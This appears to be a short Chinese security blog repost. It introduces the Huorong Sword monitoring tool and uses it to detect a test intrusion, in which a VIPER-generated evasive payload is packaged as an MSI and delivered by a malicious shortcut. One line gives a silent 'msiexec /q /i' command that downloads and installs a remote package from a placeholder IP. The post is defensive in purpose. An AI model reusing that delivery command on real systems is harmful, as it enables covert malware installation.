“燕云实验室”是河北千诚电子科技有限公司成立的网络安全攻防技术研究实验室。专注于web安全,网络攻防,安全运维,应急溯源方面的研究,开发成果应用于产品核心技术转化,国家重点科技项目攻关。
火绒剑是一款运行在Windows平台的安全分析工具,可以监控文件、注册表、网络、Windows消息以及进程间的操作。它提供了“程序行为监控”、“进程管理”、“文件管理”、“注册表管理”、“系统启动项管理”、“内核程序管理”、“代码钩子扫描”七大功能。
通过“程序行为监控”,可以对全面了解系统中所运行的程序是否存在恶意行为。“系统启动项管理”全面的列举了系统有可能运行的程序。“内核程序管理”、“代码钩子扫描”功能可以深层次分析隐藏的恶意程序。“文件管理”与“注册表管理”功能使用火绒的“内核纯净化”技术,可以轻松地突破恶意程序的自我保护与隐藏机制。
进入正题:
开始
VIPER生成一个免杀马,并启动监听:
生成exe:
exe 转 msi :
生成Lnk马:
C:\Windows\System32\msiexec.exe /q /i http://X.X.X.X/mm.msi
双击快捷方式,主机上线:
打开火绒设置,利用网络监控项,抓正在运行的程序所有网络数据包:
发现可疑.Tmp文件:
监控可疑.tmp文件的所有操作:
VIPER测试一哈,创建一个文件夹:
检测到创建文件夹行为:
结束可疑文件进程:
定位文件位置,彻底删除文件。
☆ END ☆
文章转载自燕云实验室,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。
